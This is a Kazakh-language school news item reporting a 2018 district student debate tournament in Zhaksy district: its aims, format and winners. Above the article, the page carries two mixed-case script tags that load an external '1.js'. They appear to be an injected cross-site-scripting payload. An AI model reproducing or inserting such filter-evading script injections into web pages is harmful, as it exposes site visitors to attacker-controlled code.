<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

16.02.2018

14-ақпан күні Жақсы ауданы бойынша Елбасының жолдауын талқылау аясында «Келешекке бағдар: қоғамдық сананың жаңғыртуы» тақырыбында аудандық дебат өткізілді.

Мақсаты: Әлеуметтік және шығармашылық белсенділіктерін көтеру, өзекті мәселелерді көпшілік талқылауы арқылы анализ жасау.

Міндеті:

-Жақсы ауданы бойынша дебат қозғалысын дамыту;

-Шешендік өнеріне баулу, тыңдай білуге, дұрыс қабылдауға, сараптауға, өз ойын сауатты жеткізуге үйрету;

-Инновациялық идеялармен алмасу;

-Оқушылар бойында азаматтық және патриоттық сезімдерін дамыту;

-Сын тұрғысынан ойлау қабілетін көтеру.

Дебатқа Жақсы ауданының 6-10 сыныптар оқушылары қатысты. Турнир Америка парламентінің тәсілі бойынша жоспарланды. Яғни, 3 іріктеу раунд, ¼ финалы, жартылай финал, финал өткізілді. Нәтижесінде, Ғ.Әбдірахманұлы атындағы Қима орта мектебінің 7 сынып оқушылары Касымбекова Дильназ бен Салымбай Мадина жоғары ұпай алып, жеңіске жетті.

Шәкірттеріміздің жеңісі құтты болсын! Облыстық кезеңнен сүрінбей өтіп, білім әлемінің жаңа шыңдарын бағындыруға тілектеспіз.

Просмотров: 552


Пікір қосу



Деректерді қолтаңбаға қосу